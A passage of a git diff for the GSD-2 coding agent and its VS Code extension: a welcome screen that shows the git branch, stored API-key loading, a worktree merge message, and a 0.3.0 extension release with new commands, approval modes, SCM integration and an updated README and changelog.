   return await new Promise<SerializedVisualizerData>((resolveResult, reject) => {
     execFile(
       process.execPath,
       [
-        "--import",
-        pathToFileURL(resolveTsLoader).href,
-        resolveTypeStrippingFlag(packageRoot),
-        "--input-type=module",
+        ...prefixArgs,
         "--eval",
         script,
       ],
@@ -99,6 +98,7 @@ export async function collectVisualizerData(projectCwdOverride?: string): Promis
           GSD_VISUALIZER_BASE: projectCwd,
         },
         maxBuffer: VISUALIZER_MAX_BUFFER,
+        windowsHide: true,
       },
       (error, stdout, stderr) => {
         if (error) {
diff --git a/src/welcome-screen.ts b/src/welcome-screen.ts
index 7b8d37773..80f7b03aa 100644
--- a/src/welcome-screen.ts
+++ b/src/welcome-screen.ts
@@ -6,14 +6,17 @@
  * Falls back to simple text on narrow terminals (<70 cols) or non-TTY.
  */
 
+import { execFileSync } from 'node:child_process'
 import os from 'node:os'
 import chalk from 'chalk'
+import stripAnsi from 'strip-ansi'
 import { GSD_LOGO } from './logo.js'
 
 export interface WelcomeScreenOptions {
   version: string
   modelName?: string
   provider?: string
+  remoteChannel?: string
 }
 
 function getShortCwd(): string {
@@ -24,7 +27,7 @@ function getShortCwd(): string {
 
 /** Visible length — strips ANSI escape codes before measuring. */
 function visLen(s: string): number {
-  return s.replace(/\x1b\[[0-9;]*m/g, '').length
+  return stripAnsi(s).length
 }
 
 /** Right-pad a string to the given visible width. */
@@ -32,12 +35,26 @@ function rpad(s: string, w: number): string {
   return s + ' '.repeat(Math.max(0, w - visLen(s)))
 }
 
+/** Read the current git branch name. Returns undefined on failure. */
+function getGitBranch(): string | undefined {
+  try {
+    return execFileSync('git', ['rev-parse', '--abbrev-ref', 'HEAD'], {
+      encoding: 'utf-8',
+      timeout: 2000,
+      stdio: ['ignore', 'pipe', 'ignore'],
+    }).trim() || undefined
+  } catch {
+    return undefined
+  }
+}
+
 export function printWelcomeScreen(opts: WelcomeScreenOptions): void {
   if (!process.stderr.isTTY) return
 
-  const { version, modelName, provider } = opts
+  const { version, modelName, provider, remoteChannel } = opts
   const shortCwd = getShortCwd()
-  const termWidth = Math.min((process.stderr.columns || 80) - 1, 200)
+  const branch = getGitBranch()
+  const termWidth = (process.stderr.columns || 80) - 1
 
   // Narrow terminal fallback
   if (termWidth < 70) {
@@ -69,6 +86,7 @@ export function printWelcomeScreen(opts: WelcomeScreenOptions): void {
   if (process.env.JINA_API_KEY)       toolParts.push('Jina ✓')
   if (process.env.TAVILY_API_KEY)     toolParts.push('Tavily ✓')
   if (process.env.CONTEXT7_API_KEY)   toolParts.push('Context7 ✓')
+  if (remoteChannel)                  toolParts.push(`${remoteChannel.charAt(0).toUpperCase() + remoteChannel.slice(1)} ✓`)
 
   // Tools left, hint right-aligned on the same row
   const toolsLeft  = toolParts.length > 0 ? chalk.dim('  ' + toolParts.join('  ·  ')) : ''
@@ -76,16 +94,26 @@ export function printWelcomeScreen(opts: WelcomeScreenOptions): void {
   const footerFill = RIGHT_INNER - visLen(toolsLeft) - visLen(hintRight)
   const footerRow  = toolsLeft + ' '.repeat(Math.max(1, footerFill)) + hintRight
 
+  // Combined session line: "provider / model" or just model or just provider
+  const sessionParts = [provider, modelName].filter(Boolean)
+  const sessionLine = sessionParts.length > 0
+    ? `  Session    ${chalk.dim(sessionParts.join(' / '))}`
+    : ''
+
+  // Combined project line: "~/path [branch]"
+  const branchSuffix = branch ? ` [${branch}]` : ''
+  const projectLine = `  Project    ${chalk.dim(shortCwd + branchSuffix)}`
+
   const DIVIDER = null
   const rightRows: (string | null)[] = [
     titleRow,
     DIVIDER,
-    modelName ? `  Model      ${chalk.dim(modelName)}`  : '',
-    provider  ? `  Provider   ${chalk.dim(provider)}`   : '',
-    `  Directory  ${chalk.dim(shortCwd)}`,
+    '',
+    sessionLine,
+    projectLine,
+    '',
     DIVIDER,
     footerRow,
-    '',
   ]
 
   // ── Render ──────────────────────────────────────────────────────────────────
diff --git a/src/wizard.ts b/src/wizard.ts
index 1b11e1e8d..f156161ff 100644
--- a/src/wizard.ts
+++ b/src/wizard.ts
@@ -23,9 +23,12 @@ export function loadStoredEnvKeys(authStorage: AuthStorage): void {
   ]
   for (const [provider, envVar] of providers) {
     if (!process.env[envVar]) {
-      const cred = authStorage.get(provider)
-      if (cred?.type === 'api_key' && cred.key) {
-        process.env[envVar] = cred.key as string
+      // Use getCredentialsForProvider to skip empty-key entries at index 0
+      // (left by legacy removeProviderToken which used set() with empty key)
+      const creds = authStorage.getCredentialsForProvider(provider)
+      const cred = creds.find((c: any) => c.type === 'api_key' && c.key)
+      if (cred?.type === 'api_key' && (cred as any).key) {
+        process.env[envVar] = (cred as any).key as string
       }
     }
   }
diff --git a/src/worktree-cli.ts b/src/worktree-cli.ts
index 0ad371eef..70abba856 100644
--- a/src/worktree-cli.ts
+++ b/src/worktree-cli.ts
@@ -207,7 +207,7 @@ async function doMerge(ext: ExtensionModules, basePath: string, name: string): P
   }
 
   const commitType = ext.inferCommitType(name)
-  const commitMessage = `${commitType}(${name}): merge worktree ${name}`
+  const commitMessage = `${commitType}: merge worktree ${name}\n\nGSD-Worktree: ${name}`
 
   process.stderr.write(`\nMerging ${chalk.bold.cyan(name)} → ${chalk.magenta(ext.nativeDetectMainBranch(basePath))}\n`)
   process.stderr.write(chalk.dim(`  ${status.filesChanged} files, ${chalk.green(`+${status.linesAdded}`)} ${chalk.red(`-${status.linesRemoved}`)}\n\n`))
diff --git a/tsconfig.test.json b/tsconfig.test.json
new file mode 100644
index 000000000..d1fb9db80
--- /dev/null
+++ b/tsconfig.test.json
@@ -0,0 +1,9 @@
+{
+  "extends": "./tsconfig.json",
+  "compilerOptions": {
+    "declaration": false,
+    "noEmit": false
+  },
+  "include": ["src/tests/headless-cli-surface.test.ts", "src/tests/ensure-workspace-builds.test.ts", "src/headless-events.ts", "src/headless-types.ts", "src/tests/google-search-oauth-shape.test.ts", "src/tests/google-search-auth.repro.test.ts"],
+  "exclude": []
+}
diff --git a/vscode-extension/CHANGELOG.md b/vscode-extension/CHANGELOG.md
index 836dad293..98266e301 100644
--- a/vscode-extension/CHANGELOG.md
+++ b/vscode-extension/CHANGELOG.md
@@ -1,5 +1,46 @@
 # Changelog
 
+## [0.3.0]
+
+### Added
+
+- **SCM provider** — "GSD Agent" appears in Source Control panel with accept/discard per-file diffs
+- **Change tracker** — captures original file content before agent modifications for diff and rollback
+- **Checkpoints** — automatic snapshots on each agent turn with restore capability
+- **Diagnostic bridge** — "Fix Problems in File" and "Fix All Problems" commands read VS Code diagnostics and send to agent
+- **Line-level decorations** — green/yellow highlights on agent-modified lines with gutter indicators
+- **Chat context injection** — auto-includes editor selection and file diagnostics when relevant
+- **Git integration** — commit agent changes, create branches, show diffs
+- **Approval modes** — auto-approve, ask (prompts before writes), plan-only (read-only)
+- **UI request handling** — agent questions, confirmations, and selections now show as VS Code dialogs instead of hanging
+- **Fix Errors button** — quick access to diagnostic fixing in sidebar Actions
+- **5 new settings** — `showProgressNotifications`, `activityFeedMaxItems`, `showContextWarning`, `contextWarningThreshold`, `approvalMode`
+
+### Changed
+
+- **Sidebar redesign** — compact card-based layout with collapsible sections, pill toggles, hidden empty data
+- **Workflow buttons** now route through Chat panel so responses are visible
+- **Slash completion** filtered to `/gsd` commands only
+- **Checkpoint labels** show timestamp + first action (e.g., "10:32 — Edit sidebar.ts")
+- **Session tree** supports ISO timestamp filenames (GSD's actual format)
+- **Session persistence** enabled (removed `--no-session` flag)
+- **Progress notifications** disabled by default (Chat panel provides inline progress)
+- **Sidebar reduced** from 6 panels to 3 (GSD Agent, Sessions, Activity)
+- **Settings section** starts collapsed by default
+
+## [0.2.0]
+
+### Added
+
+- **Activity feed** — real-time TreeView showing tool executions with status icons, duration, and click-to-open
+- **Workflow controls** — sidebar buttons for Auto, Next, Quick Task, Capture
+- **Context window indicator** — color-coded usage bar in sidebar with threshold warnings
+- **Session forking** — fork from any message via QuickPick
+- **Queue mode controls** — toggle steering and follow-up modes from the sidebar
+- **Enhanced conversation history** — tool call rendering, collapsible thinking blocks, search/filter, fork-from-here
+- **Enhanced code lens** — Refactor, Find Bugs, and Generate Tests alongside Ask GSD
+- **8 new commands** (33 total)
+
 ## [0.1.0]
 
 Initial release.
@@ -7,5 +48,11 @@ Initial release.
 - Full RPC client — spawns `gsd --mode rpc`, JSON line framing, all RPC commands
 - Sidebar dashboard — connection status, model info, thinking level, token usage, cost, quick actions
 - Chat participant — `@gsd` in VS Code Chat with streaming responses
-- 15 commands with keyboard shortcuts
-- Auto-start and auto-compaction configuration
+- File decorations — "G" badge on files modified by the agent
+- Bash terminal — pseudoterminal routing agent Bash tool output
+- Session tree — browse and switch between session files
+- Conversation history — webview panel with full chat log
+- Slash command completion — auto-complete for `/gsd` commands
+- Code lens — "Ask GSD" above functions and classes in TS/JS/Python/Go/Rust
+- 25 commands with 6 keyboard shortcuts
+- Auto-start, auto-compaction, and code lens configuration
diff --git a/vscode-extension/README.md b/vscode-extension/README.md
index f0f249c43..899012880 100644
--- a/vscode-extension/README.md
+++ b/vscode-extension/README.md
@@ -1,88 +1,193 @@
 # GSD-2 — VS Code Extension
 
-Control the [GSD-2 coding agent](https://github.com/gsd-build/gsd-2) directly from VS Code. Run autonomous coding sessions, chat with `@gsd` in VS Code Chat, and monitor your agent from a sidebar dashboard — all without leaving the editor.
+Control the [GSD-2 coding agent](https://github.com/gsd-build/gsd-2) directly from VS Code. Run autonomous coding sessions, chat with `@gsd`, monitor agent activity in real-time, review and accept/reject changes, and manage your workflow — all without leaving the editor.
+
+![GSD Extension Overview](docs/images/overview.png)
 
 ## Requirements
 
-GSD must be installed before activating this extension:
-
-```bash
-npm install -g gsd-pi
-```
-
-Node.js ≥ 22.0.0 and Git are required.
-
-## Features
-
-### Sidebar Dashboard
-
-Click the GSD icon in the Activity Bar to open the agent dashboard. It shows:
-
-- Connection status (connected / disconnected)
-- Active model and provider
-- Thinking level
-- Token usage and session cost
-- Quick action buttons: Start, Stop, New Session, Compact, Abort
-
-### Chat Integration (`@gsd`)
-
-Use `@gsd` in VS Code Chat (`Ctrl+Shift+I`) to send messages to the agent:
-
-```
-@gsd refactor the auth module to use JWT
-@gsd /gsd auto
-@gsd what's the current milestone status?
-```
-
-### Commands
-
-All commands are accessible via `Ctrl+Shift+P`:
-
-| Command | Description |
-|---------|-------------|
-| **GSD: Start Agent** | Connect to the GSD agent |
-| **GSD: Stop Agent** | Disconnect the agent |
-| **GSD: New Session** | Start a fresh conversation |
-| **GSD: Send Message** | Send a message to the agent |
-| **GSD: Abort Current Operation** | Interrupt the current operation |
-| **GSD: Steer Agent** | Send a steering message mid-operation |
-| **GSD: Switch Model** | Pick a model from QuickPick |
-| **GSD: Cycle Model** | Rotate to the next configured model |
-| **GSD: Set Thinking Level** | Choose off / low / medium / high |
-| **GSD: Cycle Thinking Level** | Rotate through thinking levels |
-| **GSD: Compact Context** | Manually trigger context compaction |
-| **GSD: Export Conversation as HTML** | Save the session as HTML |
-| **GSD: Show Session Stats** | Display token usage and cost |
-| **GSD: Run Bash Command** | Execute a shell command via the agent |
-| **GSD: List Available Commands** | Browse and run GSD slash commands |
-
-### Keyboard Shortcuts
-
-| Shortcut | Command |
-|----------|---------|
-| `Ctrl+Shift+G Ctrl+Shift+N` | New Session |
-| `Ctrl+Shift+G Ctrl+Shift+M` | Cycle Model |
-| `Ctrl+Shift+G Ctrl+Shift+T` | Cycle Thinking Level |
-
-## Configuration
-
-| Setting | Default | Description |
-|---------|---------|-------------|
-| `gsd.binaryPath` | `"gsd"` | Path to the GSD binary if not on PATH |
-| `gsd.autoStart` | `false` | Start the agent automatically when the extension activates |
-| `gsd.autoCompaction` | `true` | Enable automatic context compaction |
+- **GSD-2** installed globally: `npm install -g gsd-pi`
+- **Node.js** >= 22.0.0
+- **Git** installed and on PATH
+- **VS Code** >= 1.95.0
 
 ## Quick Start
 
 1. Install GSD: `npm install -g gsd-pi`
 2. Install this extension
 3. Open a project folder in VS Code
-4. `Ctrl+Shift+P` → **GSD: Start Agent**
-5. Use `@gsd` in Chat or the sidebar to interact with the agent
+4. Click the **GSD icon** in the Activity Bar (left sidebar)
+5. Click **Start Agent** or run `Ctrl+Shift+P` > **GSD: Start Agent**
+6. Start chatting with `@gsd` in Chat or click **Auto** in the sidebar
+
+---
+
+## Features
+
+### Sidebar Dashboard
+
+Click the **GSD icon** in the Activity Bar. The compact header shows connection status, model, session, message count, thinking level, context usage bar, and cost — all in two lines. Sections (Workflow, Stats, Actions, Settings) are collapsible and remember their state.
+
+### Workflow Controls
+
+One-click buttons for GSD's core commands. All route through the Chat panel so you see the full response:
+
+| Button | What it does |
+|--------|-------------|
+| **Auto** | Start autonomous mode — research, plan, execute |
+| **Next** | Execute one unit of work, then pause |
+| **Quick** | Quick task without planning (opens input) |
+| **Capture** | Capture a thought for later triage |
+
+### Chat Integration (`@gsd`)
+
+Use `@gsd` in VS Code Chat (`Cmd+Shift+I`) to talk to the agent:
+
+```
+@gsd refactor the auth module to use JWT
+@gsd /gsd auto
+@gsd fix the errors in this file
+```
+
+- **Auto-starts** the agent if not running
+- **File context** via `#file` references
+- **Selection context** — automatically includes selected code
+- **Diagnostic context** — auto-includes errors/warnings when you mention "fix" or "error"
+- **Streaming** progress, file anchors, token usage footer
+
+### Source Control Integration
+
+Agent-modified files appear in a dedicated **"GSD Agent"** section of the Source Control panel:
+
+- **Click any file** to see a before/after diff in VS Code's native diff editor
+- **Accept** or **Discard** changes per-file via inline buttons
+- **Accept All** / **Discard All** via the SCM title bar
+- Gutter diff indicators (green/red bars) show exactly what changed
+
+### Line-Level Decorations
+
+When the agent modifies a file, you'll see:
+- **Green background** on newly added lines
+- **Yellow background** on modified lines
+- **Left border gutter indicator** on all agent-touched lines
+- **Hover** any decorated line to see "Modified by GSD Agent"
+
+### Checkpoints & Rollback
+
+Automatic checkpoints are created at the start of each agent turn. Use **Discard All** in the SCM panel to revert all agent changes to their original state, or discard individual files.
+
+### Activity Feed
+
+The **Activity** panel shows a real-time log of every tool the agent executes — Read, Write, Edit, Bash, Grep, Glob — with status icons (running/success/error), duration, and click-to-open for file operations.
+
+### Sessions
+
+The **Sessions** panel lists all past sessions for the current workspace. Click any session to switch to it. The current session is highlighted green. Sessions persist to disk automatically.
+
+### Diagnostic Integration
+
+- **Fix Errors** button in the sidebar reads the active file's diagnostics from the Problems panel and sends them to the agent
+- **Fix All Problems** (`Cmd+Shift+P` > GSD: Fix All Problems) collects errors/warnings across the workspace
+- Works automatically in chat — mention "fix" or "error" and diagnostics are included
+
+### Code Lens
+
+Four inline actions above every function and class (TS/JS/Python/Go/Rust):
+
+| Action | What it does |
+|--------|-------------|
+| **Ask GSD** | Explain the function/class |
+| **Refactor** | Improve clarity, performance, or structure |
+| **Find Bugs** | Review for bugs and edge cases |
+| **Tests** | Generate test coverage |
+
+### Git Integration
+
+- **Commit Agent Changes** — stages and commits modified files with your message
+- **Create Branch** — create a new branch for agent work
+- **Show Diff** — view git diff of agent changes
+
+### Approval Modes
+
+Control how much autonomy the agent has:
+
+| Mode | Behavior |
+|------|----------|
+| **Auto-approve** | Agent runs freely (default) |
+| **Ask** | Prompts before file writes and commands |
+| **Plan-only** | Read-only — agent can analyze but not modify |
+
+Change via Settings section or `Cmd+Shift+P` > **GSD: Select Approval Mode**.
+
+### Agent UI Requests
+
+When the agent needs input (questions, confirmations, selections), VS Code dialogs appear automatically — no more hanging on `ask_user_questions`.
+
+### Additional Features
+
+- **Conversation History** — full message viewer with tool calls, thinking blocks, search, and fork-from-here
+- **Slash Command Completion** — type `/` for auto-complete of `/gsd` commands
+- **File Decorations** — "G" badge on agent-modified files in the Explorer
+- **Bash Terminal** — dedicated terminal for agent shell output
+- **Context Window Warning** — notification when context exceeds threshold
+- **Progress Notifications** — optional notification with cancel button (off by default)
+
+---
+
+## All Commands
+
+| Command | Shortcut | Description |
+|---------|----------|-------------|
+| **GSD: Start Agent** | | Connect to the GSD agent |
+| **GSD: Stop Agent** | | Disconnect the agent |
+| **GSD: New Session** | `Cmd+Shift+G` `Cmd+Shift+N` | Start a fresh conversation |
+| **GSD: Send Message** | `Cmd+Shift+G` `Cmd+Shift+P` | Send a message to the agent |
+| **GSD: Abort** | `Cmd+Shift+G` `Cmd+Shift+A` | Interrupt the current operation |
+| **GSD: Steer Agent** | `Cmd+Shift+G` `Cmd+Shift+I` | Steering message mid-operation |
+| **GSD: Switch Model** | | Pick a model from QuickPick |
+| **GSD: Cycle Model** | `Cmd+Shift+G` `Cmd+Shift+M` | Rotate to the next model |
+| **GSD: Set Thinking Level** | | Choose off / low / medium / high |
+| **GSD: Cycle Thinking** | `Cmd+Shift+G` `Cmd+Shift+T` | Rotate through thinking levels |
+| **GSD: Compact Context** | | Trigger context compaction |
+| **GSD: Export HTML** | | Save session as HTML |
+| **GSD: Session Stats** | | Display token usage and cost |
+| **GSD: Run Bash** | | Execute a shell command |
+| **GSD: List Commands** | | Browse slash commands |
+| **GSD: Set Session Name** | | Rename current session |
+| **GSD: Copy Last Response** | | Copy to clipboard |
+| **GSD: Switch Session** | | Load a different session |
+| **GSD: Show History** | | Open conversation viewer |
+| **GSD: Fork Session** | | Fork from a previous message |
+| **GSD: Fix Problems in File** | | Send file diagnostics to agent |
+| **GSD: Fix All Problems** | | Send workspace errors to agent |
+| **GSD: Commit Agent Changes** | | Git commit modified files |
+| **GSD: Create Branch** | | Create branch for agent work |
+| **GSD: Show Agent Diff** | | View git diff |
+| **GSD: Accept All Changes** | | Accept all SCM changes |
+| **GSD: Discard All Changes** | | Revert all agent modifications |
+| **GSD: Select Approval Mode** | | Choose auto-approve/ask/plan-only |
+| **GSD: Cycle Approval Mode** | | Rotate through approval modes |
+| **GSD: Code Lens** actions | | Ask, Refactor, Find Bugs, Tests |
+
+> On Windows/Linux, replace `Cmd` with `Ctrl`.
+
+## Configuration
+
+| Setting | Default | Description |
+|---------|---------|-------------|
+| `gsd.binaryPath` | `"gsd"` | Path to the GSD binary |
+| `gsd.autoStart` | `false` | Start agent on extension activation |
+| `gsd.autoCompaction` | `true` | Automatic context compaction |
+| `gsd.codeLens` | `true` | Code lens above functions/classes |
+| `gsd.showProgressNotifications` | `false` | Progress notification (off — Chat shows progress) |
+| `gsd.activityFeedMaxItems` | `100` | Max items in Activity feed |
+| `gsd.showContextWarning` | `true` | Warn when context exceeds threshold |
+| `gsd.contextWarningThreshold` | `80` | Context % that triggers warning |
+| `gsd.approvalMode` | `"auto-approve"` | Agent permission mode |
 
 ## How It Works
 
-The extension spawns `gsd --mode rpc` in the background and communicates over JSON-RPC via stdin/stdout. All RPC commands are supported, including streaming events for real-time sidebar updates.
+The extension spawns `gsd --mode rpc` and communicates over JSON-RPC via stdin/stdout. Agent events stream in real-time. The change tracker captures file state before modifications for SCM diffs and rollback. UI requests from the agent (questions, confirmations) are handled via VS Code dialogs.
 
 ## Links
 
diff --git a/vscode-extension/docs/images/overview.png b/vscode-extension/docs/images/overview.png
new file mode 100644
index 000000000..eafd6a1df
Binary files /dev/null and b/vscode-extension/docs/images/overview.png differ
diff --git a/vscode-extension/package-lock.json b/vscode-extension/package-lock.json
index 67102cd86..c7a0636db 100644
--- a/vscode-extension/package-lock.json
+++ b/vscode-extension/package-lock.json
@@ -1,12 +1,12 @@
 {
   "name": "gsd-2",
-  "version": "0.1.0",
+  "version": "0.3.0",
   "lockfileVersion": 3,
   "requires": true,
   "packages": {
     "": {
       "name": "gsd-2",
-      "version": "0.1.0",
+      "version": "0.3.0",
       "license": "MIT",
       "devDependencies": {
         "@types/vscode": "^1.95.0",
@@ -955,9 +955,9 @@
       "license": "BSD-2-Clause"
     },
     "node_modules/brace-expansion": {
-      "version": "1.1.12",
-      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.12.tgz",
-      "integrity": "sha512-9T9UjW3r0UW5c1Q7GTwllptXwhvYmEzFhzMfZ9H7FQWt+uZePjZPjBP/W1ZEyZ1twGWom5/56TF4lPcqjnDHcg==",
+      "version": "1.1.13",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-1.1.13.tgz",
+      "integrity": "sha512-9ZLprWS6EENmhEOpjCYW2c8VkmOvckIJZfkr7rBW6dObmfgJ/L1GpSYW5Hpo9lDz4D1+n0Ckz8rU7FwHDQiG/w==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
@@ -1808,9 +1808,9 @@
       }
     },
     "node_modules/glob/node_modules/brace-expansion": {
-      "version": "5.0.4",
-      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.4.tgz",
-      "integrity": "sha512-h+DEnpVvxmfVefa4jFbCf5HdH5YMDXRsmKflpf1pILZWRFlTbJpxeU55nJl4Smt5HQaGzg1o6RHFPJaOqnmBDg==",
+      "version": "5.0.5",
+      "resolved": "https://registry.npmjs.org/brace-expansion/-/brace-expansion-5.0.5.tgz",
+      "integrity": "sha512-VZznLgtwhn+Mact9tfiwx64fA9erHH/MCXEUfB/0bX/6Fz6ny5EGTXYltMocqg4xFAQZtnO3DHWWXi8RiuN7cQ==",
       "dev": true,
       "license": "MIT",
       "dependencies": {
@@ -2352,9 +2352,9 @@
       }
     },
     "node_modules/lodash": {
-      "version": "4.17.23",
-      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.17.23.tgz",
-      "integrity": "sha512-LgVTMpQtIopCi79SJeDiP0TfWi5CNEc/L/aRdTh3yIvmZXTnheWpKjSZhnvMl8iXbC1tFg9gdHHDMLoV7CnG+w==",
+      "version": "4.18.1",
+      "resolved": "https://registry.npmjs.org/lodash/-/lodash-4.18.1.tgz",
+      "integrity": "sha512-dMInicTPVE8d1e5otfwmmjlxkZoUpiVLwyeTdUsi/Caj/gfzzblBcCE5sRHV/AsjuCmxWrte2TNGSYuCeCq+0Q==",
       "dev": true,
       "license": "MIT"
     },
@@ -2903,9 +2903,9 @@
       "license": "ISC"
     },
     "node_modules/picomatch": {
-      "version": "2.3.1",
-      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.1.tgz",
-      "integrity": "sha512-JU3teHTNjmE2VCGFzuY8EXzCDVwEqB2a8fsIvwaStHhAWJEeVd1o1QD80CU6+ZdEXXSLbSsuLwJjkCBWqRQUVA==",
+      "version": "2.3.2",
+      "resolved": "https://registry.npmjs.org/picomatch/-/picomatch-2.3.2.tgz",
+      "integrity": "sha512-V7+vQEJ06Z+c5tSye8S+nHUfI51xoXIXjHQ99cQtKUkQqqO1kO/KCJUfZXuB47h/YBlDhah2H3hdUGXn8ie0oA==",
       "dev": true,
       "license": "MIT",
       "engines": {
diff --git a/vscode-extension/package.json b/vscode-extension/package.json
index 536b78d7b..2a2088fdf 100644
--- a/vscode-extension/package.json
+++ b/vscode-extension/package.json
@@ -1,9 +1,9 @@
 {
   "name": "gsd-2",
   "displayName": "GSD-2",
-  "description": "VS Code integration for the GSD-2 coding agent — sidebar dashboard, @gsd chat participant, and 15 commands",
+  "description": "VS Code integration for the GSD-2 coding agent — sidebar dashboard, @gsd chat participant, activity feed, conversation history, code lens, session forking, slash command completion, workflow controls, and 33 commands",
   "publisher": "FluxLabs",
-  "version": "0.1.0",
+  "version": "0.3.0",
   "icon": "logo.jpg",
   "license": "MIT",
   "repository": {
@@ -29,6 +29,7 @@
     "color": "#1a1a2e",
     "theme": "dark"
   },
+  "extensionKind": ["workspace"],
   "engines": {
     "vscode": "^1.95.0"
   },
@@ -101,6 +102,133 @@
       {
         "command": "gsd.listCommands",
         "title": "GSD: List Available Commands"
+      },
+      {
+        "command": "gsd.toggleAutoRetry",
+        "title": "GSD: Toggle Auto-Retry"
+      },
+      {
+        "command": "gsd.abortRetry",
+        "title": "GSD: Abort Retry"
+      },
+      {
+        "command": "gsd.setSessionName",
+        "title": "GSD: Set Session Name"
+      },
+      {
+        "command": "gsd.copyLastResponse",
+        "title": "GSD: Copy Last Response"
+      },
+      {
+        "command": "gsd.switchSession",
+        "title": "GSD: Switch Session"
+      },
+      {
+        "command": "gsd.refreshSessions",
+        "title": "GSD: Refresh Sessions",
+        "icon": "$(refresh)"
+      },
+      {
+        "command": "gsd.clearFileDecorations",
+        "title": "GSD: Clear File Decorations"
+      },
+      {
+        "command": "gsd.showHistory",
+        "title": "GSD: Show Conversation History"
+      },
+      {
+        "command": "gsd.askAboutSymbol",
+        "title": "GSD: Ask About Symbol"
+      },
+      {
+        "command": "gsd.clearActivity",
+        "title": "GSD: Clear Activity Feed",
+        "icon": "$(clear-all)"
+      },
+      {
+        "command": "gsd.forkSession",
+        "title": "GSD: Fork Session"
+      },
+      {
+        "command": "gsd.toggleSteeringMode",
+        "title": "GSD: Toggle Steering Mode"
+      },
+      {
+        "command": "gsd.toggleFollowUpMode",
+        "title": "GSD: Toggle Follow-Up Mode"
+      },
+      {
+        "command": "gsd.refactorSymbol",
+        "title": "GSD: Refactor Symbol"
+      },
+      {
+        "command": "gsd.findBugsSymbol",
+        "title": "GSD: Find Bugs in Symbol"
+      },
+      {
+        "command": "gsd.generateTestsSymbol",
+        "title": "GSD: Generate Tests for Symbol"
+      },
+      {
+        "command": "gsd.acceptAllChanges",
+        "title": "GSD: Accept All Agent Changes",
+        "icon": "$(check-all)"
+      },
+      {
+        "command": "gsd.discardAllChanges",
+        "title": "GSD: Discard All Agent Changes",
+        "icon": "$(discard)"
+      },
+      {
+        "command": "gsd.acceptFileChanges",
+        "title": "Accept Changes",
+        "icon": "$(check)"
+      },
+      {
+        "command": "gsd.discardFileChanges",
+        "title": "Discard Changes",
+        "icon": "$(discard)"
+      },
+      {
+        "command": "gsd.restoreCheckpoint",
+        "title": "GSD: Restore Checkpoint"
+      },
+      {
+        "command": "gsd.fixProblemsInFile",
+        "title": "GSD: Fix Problems in File"
+      },
+      {
+        "command": "gsd.fixAllProblems",
+        "title": "GSD: Fix All Problems"
+      },
+      {
+        "command": "gsd.clearDiagnostics",
+        "title": "GSD: Clear Agent Diagnostics"
+      },
+      {
+        "command": "gsd.commitAgentChanges",
+        "title": "GSD: Commit Agent Changes"
+      },
+      {
+        "command": "gsd.createAgentBranch",
+        "title": "GSD: Create Branch for Agent Work"
+      },
+      {
+        "command": "gsd.showAgentDiff",
+        "title": "GSD: Show Agent Diff"
+      },
+      {
+        "command": "gsd.clearPlan",
+        "title": "GSD: Clear Plan View",
+        "icon": "$(clear-all)"
+      },
+      {
+        "command": "gsd.cycleApprovalMode",
+        "title": "GSD: Cycle Approval Mode"
+      },
+      {
+        "command": "gsd.selectApprovalMode",
+        "title": "GSD: Select Approval Mode"
       }
     ],
     "keybindings": [
@@ -118,6 +246,21 @@
         "command": "gsd.cycleThinking",
         "key": "ctrl+shift+g ctrl+shift+t",
         "mac": "cmd+shift+g cmd+shift+t"
+      },
+      {
+        "command": "gsd.abort",
+        "key": "ctrl+shift+g ctrl+shift+a",
+        "mac": "cmd+shift+g cmd+shift+a"
+      },
+      {
+        "command": "gsd.steer",
+        "key": "ctrl+shift+g ctrl+shift+i",
+        "mac": "cmd+shift+g cmd+shift+i"
+      },
+      {
+        "command": "gsd.sendMessage",
+        "key": "ctrl+shift+g ctrl+shift+p",
+        "mac": "cmd+shift+g cmd+shift+p"
       }
     ],
     "viewsContainers": {
@@ -135,6 +278,52 @@
           "type": "webview",
           "id": "gsd-sidebar",
           "name": "GSD Agent"
+        },
+        {
+          "id": "gsd-sessions",
+          "name": "Sessions"
+        },
+        {
+          "id": "gsd-activity",
+          "name": "Activity"
+        }
+      ]
+    },
+    "menus": {
+      "view/title": [
+        {
+          "command": "gsd.refreshSessions",
+          "when": "view == gsd-sessions",
+          "group": "navigation"
+        },
+        {
+          "command": "gsd.clearActivity",
+          "when": "view == gsd-activity",
+          "group": "navigation"
+        }
+      ],
+      "scm/title": [
+        {
+          "command": "gsd.acceptAllChanges",
+          "group": "navigation",
+          "when": "scmProvider == gsd"
+        },
+        {
+          "command": "gsd.discardAllChanges",
+          "group": "navigation",
+          "when": "scmProvider == gsd"
+        }
+      ],
+      "scm/resourceState/context": [
+        {
+          "command": "gsd.acceptFileChanges",
+          "group": "inline",
+          "when": "scmProvider == gsd"
+        },
+        {
+          "command": "gsd.discardFileChanges",
+          "group": "inline",
+          "when": "scmProvider == gsd"
         }
       ]
     },
@@ -164,6 +353,46 @@
           "type": "boolean",
           "default": true,
           "description": "Enable automatic context compaction"
+        },
+        "gsd.codeLens": {
+          "type": "boolean",
+          "default": true,
+          "description": "Show 'Ask GSD' code lens above functions and classes"
+        },
+        "gsd.showProgressNotifications": {
+          "type": "boolean",
+          "default": false,
+          "description": "Show progress notification while the agent is working"
+        },
+        "gsd.activityFeedMaxItems": {
+          "type": "number",
+          "default": 100,
+          "minimum": 10,
+          "maximum": 500,
+          "description": "Maximum number of items shown in the Activity feed"
+        },
+        "gsd.showContextWarning": {
+          "type": "boolean",
+          "default": true,
+          "description": "Warn when context window usage exceeds the threshold"
+        },
+        "gsd.contextWarningThreshold": {
+          "type": "number",
+          "default": 80,
+          "minimum": 50,
+          "maximum": 95,
+          "description": "Context window usage percentage that triggers a warning"
+        },
+        "gsd.approvalMode": {
+          "type": "string",
+          "default": "auto-approve",
+          "enum": ["auto-approve", "ask", "plan-only"],
+          "enumDescriptions": [
+            "Agent runs freely without prompts",
+            "Prompt before file changes and commands",
+            "Read-only mode — agent can analyze but not modify"
+          ],
+          "description": "Approval mode for agent actions"
         }
       }
     }
diff --git a/vscode-extension/src/activity-feed.ts b/vscode-extension/src/activity-feed.ts
new file mode 100644
index 000000000..a07117ec9
--- /dev/null
+++ b/vscode-extension/src/activity-feed.ts
@@ -0,0 +1,212 @@
+import * as vscode from "vscode";
+import type { GsdClient, AgentEvent } from "./gsd-client.js";
+
+interface ActivityItem {
